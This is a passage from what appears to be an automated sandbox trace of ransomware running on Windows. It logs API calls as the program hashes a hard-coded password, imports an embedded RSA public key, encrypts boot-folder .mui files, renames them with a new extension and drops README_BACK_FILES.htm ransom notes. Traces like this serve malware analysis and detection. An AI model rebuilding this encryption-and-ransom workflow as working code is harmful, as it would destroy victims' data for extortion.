(dwErrCode=0x5) [0126.434] GetLastError () returned 0x5 [0126.434] SetLastError (dwErrCode=0x5) [0126.434] GetLastError () returned 0x5 [0126.434] SetLastError (dwErrCode=0x5) [0126.434] GetLastError () returned 0x5 [0126.434] SetLastError (dwErrCode=0x5) [0126.434] GetLastError () returned 0x5 [0126.434] SetLastError (dwErrCode=0x5) [0126.434] GetLastError () returned 0x5 [0126.434] SetLastError (dwErrCode=0x5) [0126.434] GetLastError () returned 0x5 [0126.434] SetLastError (dwErrCode=0x5) [0126.434] GetLastError () returned 0x5 [0126.434] SetLastError (dwErrCode=0x5) [0126.434] GetLastError () returned 0x5 [0126.434] SetLastError (dwErrCode=0x5) [0126.434] GetLastError () returned 0x5 [0126.434] SetLastError (dwErrCode=0x5) [0126.434] GetLastError () returned 0x5 [0126.434] SetLastError (dwErrCode=0x5) [0126.434] GetLastError () returned 0x5 [0126.434] SetLastError (dwErrCode=0x5) [0126.434] GetLastError () returned 0x5 [0126.434] SetLastError (dwErrCode=0x5) [0126.434] GetLastError () returned 0x5 [0126.434] SetLastError (dwErrCode=0x5) [0126.434] GetLastError () returned 0x5 [0126.434] SetLastError (dwErrCode=0x5) [0126.434] GetLastError () returned 0x5 [0126.435] SetLastError (dwErrCode=0x5) [0126.435] GetLastError () returned 0x5 [0126.435] SetLastError (dwErrCode=0x5) [0126.435] GetLastError () returned 0x5 [0126.435] SetLastError (dwErrCode=0x5) [0126.435] GetLastError () returned 0x5 [0126.435] SetLastError (dwErrCode=0x5) [0126.435] GetLastError () returned 0x5 [0126.435] SetLastError (dwErrCode=0x5) [0126.435] GetLastError () returned 0x5 [0126.435] SetLastError (dwErrCode=0x5) [0126.435] GetLastError () returned 0x5 [0126.435] SetLastError (dwErrCode=0x5) [0126.435] GetLastError () returned 0x5 [0126.435] SetLastError (dwErrCode=0x5) [0126.435] GetFileAttributesA (lpFileName="C:\\\\Boot\\cs-CZ\\memtest.exe.mui" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui")) returned 0x20 [0126.435] SetFileAttributesA (lpFileName="C:\\\\Boot\\cs-CZ\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0126.435] CreateFileA (lpFileName="C:\\\\Boot\\cs-CZ\\memtest.exe.mui" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.436] CreateFileA (lpFileName="C:\\\\Boot\\cs-CZ\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0126.436] SetFileAttributesA (lpFileName="C:\\\\Boot\\cs-CZ\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0126.436] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27df408) returned 1 [0126.438] CryptCreateHash (in: hProv=0x27df408, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0126.438] lstrlenA (lpString="swVGAbWiEnRNHPeSGjNvHnzlzMlQm") returned 29 [0126.438] CryptHashData (hHash=0x69d3a8, pbData=0x5bd010, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0126.438] CryptDeriveKey (in: hProv=0x27df408, Algid=0x6610, hBaseData=0x69d3a8, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d428) returned 1 [0126.438] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0126.438] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0126.438] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27df738) returned 1 [0126.439] CryptImportPublicKeyInfo (in: hCryptProv=0x27df738, dwCertEncodingType=0x1, pInfo=0x27db218*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27db248*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27db250*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69d768) returned 1 [0126.439] CryptEncrypt (in: hKey=0x69d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0126.439] CryptEncrypt (in: hKey=0x69d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27dfb78*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27dfb78*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0126.439] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27dfb78*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27dfb78*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0126.440] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27e18b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27e18b0, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0126.440] CryptEncrypt (in: hKey=0x69d428, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e18b0*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x27e18b0*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0126.440] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27e18b0*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27e18b0*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0126.440] CloseHandle (hObject=0xffffffff) returned 1 [0126.440] CloseHandle (hObject=0x5cd8) returned 1 [0126.440] CopyFileA (lpExistingFileName="C:\\\\Boot\\cs-CZ\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\cs-CZ\\memtest.exe.mui" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0126.444] SetFileAttributesA (lpFileName="C:\\\\Boot\\cs-CZ\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0126.444] DeleteFileA (lpFileName="C:\\\\Boot\\cs-CZ\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui.gsg")) returned 1 [0126.445] MoveFileA (lpExistingFileName="C:\\\\Boot\\cs-CZ\\memtest.exe.mui" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\cs-CZ\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui.fuck")) returned 0 [0126.445] CryptDestroyHash (hHash=0x69d3a8) returned 1 [0126.445] CryptDestroyKey (hKey=0x69d428) returned 1 [0126.446] CryptReleaseContext (hProv=0x27df408, dwFlags=0x0) returned 1 [0126.446] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0126.446] FindClose (in: hFindFile=0x69d328 | out: hFindFile=0x69d328) returned 1 [0126.446] GetFileAttributesA (lpFileName="C:\\\\Boot\\cs-CZ\\README_BACK_FILES.htm" (normalized: "c:\\boot\\cs-cz\\readme_back_files.htm")) returned 0xffffffff [0126.446] AreFileApisANSI () returned 1 [0126.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d4b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0126.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d4b0, cbMultiByte=-1, lpWideCharStr=0x5c5108, cchWideChar=37 | out: lpWideCharStr="C:\\\\Boot\\cs-CZ\\README_BACK_FILES.htm") returned 37 [0126.446] CreateFileW (lpFileName="C:\\\\Boot\\cs-CZ\\README_BACK_FILES.htm" (normalized: "c:\\boot\\cs-cz\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cec [0126.449] GetFileType (hFile=0x5cec) returned 0x1 [0126.450] GetLastError () returned 0x0 [0126.450] SetLastError (dwErrCode=0x0) [0126.450] GetLastError () returned 0x0 [0126.450] SetLastError (dwErrCode=0x0) [0126.450] WriteFile (in: hFile=0x5cec, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0126.451] CloseHandle (hObject=0x5cec) returned 1 [0126.451] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0126.451] FindFirstFileA (in: lpFileName="C:\\\\Boot\\da-DK\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x69d368 [0126.451] FindNextFileA (in: hFindFile=0x69d368, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.451] FindNextFileA (in: hFindFile=0x69d368, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.452] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0126.452] GetLastError () returned 0x0 [0126.452] SetLastError (dwErrCode=0x0) [0126.452] GetLastError () returned 0x0 [0126.452] SetLastError (dwErrCode=0x0) [0126.452] GetLastError () returned 0x0 [0126.452] SetLastError (dwErrCode=0x0) [0126.452] GetLastError () returned 0x0 [0126.452] SetLastError (dwErrCode=0x0) [0126.452] GetLastError () returned 0x0 [0126.452] SetLastError (dwErrCode=0x0) [0126.452] GetLastError () returned 0x0 [0126.452] SetLastError (dwErrCode=0x0) [0126.452] GetLastError () returned 0x0 [0126.452] SetLastError (dwErrCode=0x0) [0126.452] GetLastError () returned 0x0 [0126.452] SetLastError (dwErrCode=0x0) [0126.452] GetLastError () returned 0x0 [0126.452] SetLastError (dwErrCode=0x0) [0126.452] GetLastError () returned 0x0 [0126.452] SetLastError (dwErrCode=0x0) [0126.452] GetLastError () returned 0x0 [0126.452] SetLastError (dwErrCode=0x0) [0126.452] GetLastError () returned 0x0 [0126.452] SetLastError (dwErrCode=0x0) [0126.452] GetLastError () returned 0x0 [0126.452] SetLastError (dwErrCode=0x0) [0126.452] GetLastError () returned 0x0 [0126.452] SetLastError (dwErrCode=0x0) [0126.453] GetLastError () returned 0x0 [0126.453] SetLastError (dwErrCode=0x0) [0126.453] GetLastError () returned 0x0 [0126.453] SetLastError (dwErrCode=0x0) [0126.453] GetLastError () returned 0x0 [0126.453] SetLastError (dwErrCode=0x0) [0126.453] GetLastError () returned 0x0 [0126.453] SetLastError (dwErrCode=0x0) [0126.453] GetLastError () returned 0x0 [0126.453] SetLastError (dwErrCode=0x0) [0126.453] GetLastError () returned 0x0 [0126.453] SetLastError (dwErrCode=0x0) [0126.453] GetLastError () returned 0x0 [0126.453] SetLastError (dwErrCode=0x0) [0126.453] GetLastError () returned 0x0 [0126.453] SetLastError (dwErrCode=0x0) [0126.453] GetLastError () returned 0x0 [0126.453] SetLastError (dwErrCode=0x0) [0126.453] GetLastError () returned 0x0 [0126.453] SetLastError (dwErrCode=0x0) [0126.453] GetLastError () returned 0x0 [0126.453] SetLastError (dwErrCode=0x0) [0126.453] GetFileAttributesA (lpFileName="C:\\\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui")) returned 0x20 [0126.454] SetFileAttributesA (lpFileName="C:\\\\Boot\\da-DK\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0126.454] CreateFileA (lpFileName="C:\\\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.454] CreateFileA (lpFileName="C:\\\\Boot\\da-DK\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0126.454] SetFileAttributesA (lpFileName="C:\\\\Boot\\da-DK\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0126.455] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27df8d0) returned 1 [0126.457] CryptCreateHash (in: hProv=0x27df8d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0126.457] lstrlenA (lpString="swVGAbWiEnRNHPeSGjNvHnzlzMlQm") returned 29 [0126.457] CryptHashData (hHash=0x69d328, pbData=0x5bd010, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0126.457] CryptDeriveKey (in: hProv=0x27df8d0, Algid=0x6610, hBaseData=0x69d328, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d428) returned 1 [0126.457] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0126.457] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0126.457] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27df5a0) returned 1 [0126.457] CryptImportPublicKeyInfo (in: hCryptProv=0x27df5a0, dwCertEncodingType=0x1, pInfo=0x27db558*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27db588*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27db590*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69d4e8) returned 1 [0126.457] CryptEncrypt (in: hKey=0x69d4e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0126.457] CryptEncrypt (in: hKey=0x69d4e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27df848*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27df848*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0126.457] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27df848*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27df848*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0126.458] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27e1e18, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27e1e18, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0126.458] CryptEncrypt (in: hKey=0x69d428, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e1e18*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x27e1e18*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0126.458] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27e1e18*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27e1e18*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0126.458] CloseHandle (hObject=0xffffffff) returned 1 [0126.458] CloseHandle (hObject=0x5cd8) returned 1 [0126.459] CopyFileA (lpExistingFileName="C:\\\\Boot\\da-DK\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0126.462] SetFileAttributesA (lpFileName="C:\\\\Boot\\da-DK\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0126.463] DeleteFileA (lpFileName="C:\\\\Boot\\da-DK\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui.gsg")) returned 1 [0126.464] MoveFileA (lpExistingFileName="C:\\\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\da-DK\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui.fuck")) returned 0 [0126.464] CryptDestroyHash (hHash=0x69d328) returned 1 [0126.464] CryptDestroyKey (hKey=0x69d428) returned 1 [0126.464] CryptReleaseContext (hProv=0x27df8d0, dwFlags=0x0) returned 1 [0126.464] FindNextFileA (in: hFindFile=0x69d368, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.464] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0126.464] GetLastError () returned 0x5 [0126.464] SetLastError (dwErrCode=0x5) [0126.464] GetLastError () returned 0x5 [0126.464] SetLastError (dwErrCode=0x5) [0126.464] GetLastError () returned 0x5 [0126.465] SetLastError (dwErrCode=0x5) [0126.465] GetLastError () returned 0x5 [0126.465] SetLastError (dwErrCode=0x5) [0126.465] GetLastError () returned 0x5 [0126.465] SetLastError (dwErrCode=0x5) [0126.465] GetLastError () returned 0x5 [0126.465] SetLastError (dwErrCode=0x5) [0126.465] GetLastError () returned 0x5 [0126.465] SetLastError (dwErrCode=0x5) [0126.465] GetLastError () returned 0x5 [0126.465] SetLastError (dwErrCode=0x5) [0126.465] GetLastError () returned 0x5 [0126.465] SetLastError (dwErrCode=0x5) [0126.465] GetLastError () returned 0x5 [0126.465] SetLastError (dwErrCode=0x5) [0126.465] GetLastError () returned 0x5 [0126.465] SetLastError (dwErrCode=0x5) [0126.465] GetLastError () returned 0x5 [0126.465] SetLastError (dwErrCode=0x5) [0126.465] GetLastError () returned 0x5 [0126.465] SetLastError (dwErrCode=0x5) [0126.465] GetLastError () returned 0x5 [0126.465] SetLastError (dwErrCode=0x5) [0126.465] GetLastError () returned 0x5 [0126.465] SetLastError (dwErrCode=0x5) [0126.465] GetLastError () returned 0x5 [0126.465] SetLastError (dwErrCode=0x5) [0126.465] GetLastError () returned 0x5 [0126.465] SetLastError (dwErrCode=0x5) [0126.465] GetLastError () returned 0x5 [0126.465] SetLastError (dwErrCode=0x5) [0126.465] GetLastError () returned 0x5 [0126.465] SetLastError (dwErrCode=0x5) [0126.465] GetLastError () returned 0x5 [0126.465] SetLastError (dwErrCode=0x5) [0126.465] GetLastError () returned 0x5 [0126.465] SetLastError (dwErrCode=0x5) [0126.465] GetLastError () returned 0x5 [0126.466] SetLastError (dwErrCode=0x5) [0126.466] GetLastError () returned 0x5 [0126.466] SetLastError (dwErrCode=0x5) [0126.466] GetLastError () returned 0x5 [0126.466] SetLastError (dwErrCode=0x5) [0126.466] GetLastError () returned 0x5 [0126.466] SetLastError (dwErrCode=0x5) [0126.466] GetFileAttributesA (lpFileName="C:\\\\Boot\\da-DK\\memtest.exe.mui" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui")) returned 0x20 [0126.466] SetFileAttributesA (lpFileName="C:\\\\Boot\\da-DK\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0126.466] CreateFileA (lpFileName="C:\\\\Boot\\da-DK\\memtest.exe.mui" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.466] CreateFileA (lpFileName="C:\\\\Boot\\da-DK\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0126.467] SetFileAttributesA (lpFileName="C:\\\\Boot\\da-DK\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0126.467] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27dfe20) returned 1 [0126.469] CryptCreateHash (in: hProv=0x27dfe20, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0126.469] lstrlenA (lpString="swVGAbWiEnRNHPeSGjNvHnzlzMlQm") returned 29 [0126.469] CryptHashData (hHash=0x69d328, pbData=0x5bcf98, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0126.469] CryptDeriveKey (in: hProv=0x27dfe20, Algid=0x6610, hBaseData=0x69d328, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d6e8) returned 1 [0126.469] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0126.469] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0126.469] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27dfd10) returned 1 [0126.470] CryptImportPublicKeyInfo (in: hCryptProv=0x27dfd10, dwCertEncodingType=0x1, pInfo=0x27db968*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27db998*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27db9a0*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69d3a8) returned 1 [0126.470] CryptEncrypt (in: hKey=0x69d3a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0126.470] CryptEncrypt (in: hKey=0x69d3a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27df6b0*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27df6b0*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0126.470] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27df6b0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27df6b0*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0126.470] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27e24c8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27e24c8, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0126.470] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e24c8*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x27e24c8*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0126.471] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27e24c8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27e24c8*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0126.471] CloseHandle (hObject=0xffffffff) returned 1 [0126.471] CloseHandle (hObject=0x5cd8) returned 1 [0126.471] CopyFileA (lpExistingFileName="C:\\\\Boot\\da-DK\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\da-DK\\memtest.exe.mui" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0126.476] SetFileAttributesA (lpFileName="C:\\\\Boot\\da-DK\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0126.476] DeleteFileA (lpFileName="C:\\\\Boot\\da-DK\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui.gsg")) returned 1 [0126.478] MoveFileA (lpExistingFileName="C:\\\\Boot\\da-DK\\memtest.exe.mui" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\da-DK\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui.fuck")) returned 0 [0126.478] CryptDestroyHash (hHash=0x69d328) returned 1 [0126.478] CryptDestroyKey (hKey=0x69d6e8) returned 1 [0126.478] CryptReleaseContext (hProv=0x27dfe20, dwFlags=0x0) returned 1 [0126.478] FindNextFileA (in: hFindFile=0x69d368, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0126.478] FindClose (in: hFindFile=0x69d368 | out: hFindFile=0x69d368) returned 1 [0126.478] GetFileAttributesA (lpFileName="C:\\\\Boot\\da-DK\\README_BACK_FILES.htm" (normalized: 